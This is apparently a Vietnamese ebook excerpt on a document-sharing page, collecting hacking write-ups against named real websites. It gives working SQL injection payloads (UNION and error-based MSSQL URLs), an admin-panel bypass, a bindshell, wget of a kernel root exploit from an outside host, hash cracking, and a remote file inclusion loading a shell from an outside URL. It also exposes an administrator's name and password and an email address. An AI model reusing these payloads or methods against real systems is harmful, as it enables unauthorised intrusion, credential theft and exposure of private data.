1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 307 ppt

5 125 0

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Nội dung

-Làm cách nào để login với quyền "Host admin" đây ! -> rất đơn giản ! -> Sau khi ta đã login với Account bình thường -> run file "dsp_newreseller.asp" ngay trên trình duyệt mới vừa login với link http://[target]/admin/hosting/dsp_newreseller.asp "! -> sau đó run trở lại với link " http://[target]/admin/ " ngay trên trình duyệt này luôn ! -> hic ! nó bắt ta login lại ! -> làm sao đây -> hãy bình tĩnh , đây chính là chổ che mờ mắt ta đây ! -> hay gõ lai link như sau : "http://[target]/admin/main.asp" -> điều thú vị đã xãy ra -> " Host Admin : Hcadmin " Hết phần II // KeHieuHoc - HCE Group \\ how i getroot yokto.de Bỏ qua làm thế nào tui có shell trên server đó , vì nó nằm ngoài phạm vi bài viết info của server bindshell lên server 66.29.6.213 , port :11457 bindshell thành công : getroot : thấy kernel "Linux yokto.de 2.4.20 #1 Fri Oct 24 10:31:56 CEST 2003 i686 unknown" , chắc chắn dính 1 đống bug lên www.milw0rm.com tìm xem chọn 1 cái trong list :http://sirhungnguyen.net/kernel/ tui chọn local24 wget lên server : Trích: wget http://sirhungnguyen.net/local24 và run nó rooted , va` end game killua(HCE) Tôi đã "hack" diendantudodanchu như thế nào Ok, hôm nay viết cái tut cho mọi người tham khảo chút: - Đầu tiên thì thử thăm dò xem sao: Trích: http://www.whois.net/?d=www.diendantudodanchu.net http://www.domaintools.com/reverse-i tudodanchu.net - Thu được: Trích: Host: bluehost.com IP: 70.103.189.64 (share cho 992 hosts) Domain mua tại: planetdomain.com Email: farmbaby@gmail.com - Có thể thấy khả năng local là không thể, thứ nhất bluehost secure rất kỹ, thứ hai họ phân host theo số box, ở đây site này nằm tại box64. - Tuy nhiên site này dùng nuke, mà nuke thì bug ra liên tục. - Ok, vào search đánh vào: Trích: s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/* - Ok, dính bug, thu được hash. - Tiếp theo tìm cách fake, tuy nhiên cookie bị mã hóa, tính sao giờ. - Xem ra phải crack cái hash kia. - Open rainbow, gõ vào: Trích: C:\>rcrack G:\md5table\*.rt -f pass.txt - Crack thành công - Login - Up shell Vnrekcah(vniss) Nhà xuất bản chính trị quốc gia Ngồi learn get root oải quá lang thang tự nhiên lòi ra thằng này . Nhìn nó nghi nghi thế là check SQL thử - Hi.c cái này bình thường ko có gì bà con đừng có chửi nha Code: http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074' thêm đại dấu ' vô . he biết ngay mà nhìn đã thấy nghi rồi Code: Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string ''. /SCart/cart.asp, line 76 Hí làm gì giờ nhỉ thử lấy column xem nào ^.^ Code: http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and %201=convert(int,(select%20top%201%20table_name%20from%20information_s chema.columns%20where%20table_name%20not%20in%20(%20''))) sp_password được gì thế này Code: Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'Address' to a column of data type int. /SCart/cart.asp, line 76 thế là lòi ra rồi he he . tiếp tục query ta được một đống sau Code: http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and %201=convert(int,(select%20top%201%20table_name%20from%20information_s chema.columns%20where%20table_name%20not%20in%20(%20'Address','AlsoP urchased','Authors','BEGInventory','BEGPayables','BEGReceivables','BEGReceiva bles','Books','Categories','Contacts','Customers','DiscountRate','NewsTopics','News Sources','Orders','PayablesTrack','PaymentType','ReceivablesTrack','SachDBchuaT G','SachDBcoTG','Sales','Search','Session','Settings','Stores','sysconstraints','sysseg ments','TaxRate','Test','dtproperties','Employees','Inventory','InventoryDetails','Inve ntoryTrack','ItemAuthor','ItemAuthorKeyword','ItemCategory','Items','ItemSubject Keyword','ItemSubjectKeyword','ItemTitleKeyword','ItemType','ItemWineryKeyw ord','Keywords','News','TheLoaiSach','TransactionDetails','vwAccounts','Wineries', 'Wines'))) sp_password Nhìn cái vwAccounts thấy nghi nghi nhưng hok có pass admin T.T Hóa ra nó nằm ở Customers Code: http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and %201=convert(int,(select%20top%201%20column_name%20from%20information _schema.columns%20where%20table_name='customers'%20AND%20column_na me%20not%20in%20('PKId','Alias','Password','CustomerName','AddressId','Email' ,'LastSale','TotalSaleYTD','Balance','Category','CreditRating','CreditLimit'))) sp_password Cứ từ từ mà soi là ta lại được những table kia ^.^ Customname kìa hihi Password kìa ^.^ thế mà làm mình soi cái này mới ức chứ Code: http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and %201=convert(int,(select%20top%201%20column_name%20from%20information _schema.columns%20where%20table_name='Orders'%20AND%20column_name %20not%20in%20('PKId','CustomerId','EmployeeId','OtherStoreId','StoreId','Suppl ierId','OrderType','OrderStatus','OrderDate','PickupDate','ShippingHandling','ShipT oName',%20'ShipToAddressId'))) sp_password hè hè bây giờ ta lấy password thôi Code: http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%2%co nvert(int,(select top 1 CustomerName%2b'/'%2bPassword from Customers)) sp_password Hè hè ra Đào Ngọc Đạt/NgocDat là name và pass của admin >Sướng nhá . Nhưng mà vẫn chưa thấy link login đâu cả . Lười check thôi thì đoán vậy login không phải , thử nguoiquantri không phải . Khôpng biết Admin có để link login vô ko nhỉ . Đang chán thế nào tay lại đánh thêm vào url dòng admin thế là nó lòi ngay ra . Hic kể ra cũng có lúc ngu thật Code: http://www.nxbctqg.org.vn/admin Ô nhưng sao thế này nó đòi ID để login T.T Thử đại cái usename Đào Ngọc Đạt không được hehe lại phải đi soi típ rùi . Nhưng mà đói rùi anh em vô check nha thế mới vui ^.^ Đi ăn cơm cái đã . Chú ý mấy cái table có ID đằng sau anh em nha . The end : Đã báo admin . Không phá hoại gì . Lạy chúa tha tội con thờ Phật cơ T.T Kecodoc(HCE) how i hacked nhactre.biz ! <?vnforce /* #################################### ## site: nhactre.biz ## ## server: 62.214.98.162 ## ## -Method: Local attack ## ## trình bày: black_hat_cr @ VnForce Team ## ## (c) HcEgRoUp.net ## ## Chia sẽ để được chia sẽ ! ## #################################### */ 1, Tìm cách cho 1 con shell lên server, nhưng bằng cách nào ? Scan server scanning to drsownrx.com drsownrx.com/template1/template1.php Code: http://drsownrx.com/template1/template1.php?load=feature009 -> Code: http://drsownrx.com/template1/template1.php?load=vnforce hiện ra lỗi: Code: Warning: main(vnforce.inc): failed to open stream: No such file or directory in /mounted-storage/home19b/sub001/sc19679- TTZP/DrsOwnRx.com/template1/template1.php on line 31 hehehe trời giúp ta ! include vào liền: /template1/template1.php?load=http://aznatc.info/w/navaro.txt? nr57 từ từ hiện ra bước 1 và bước quan trọng nhất đã xong. Trích:

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN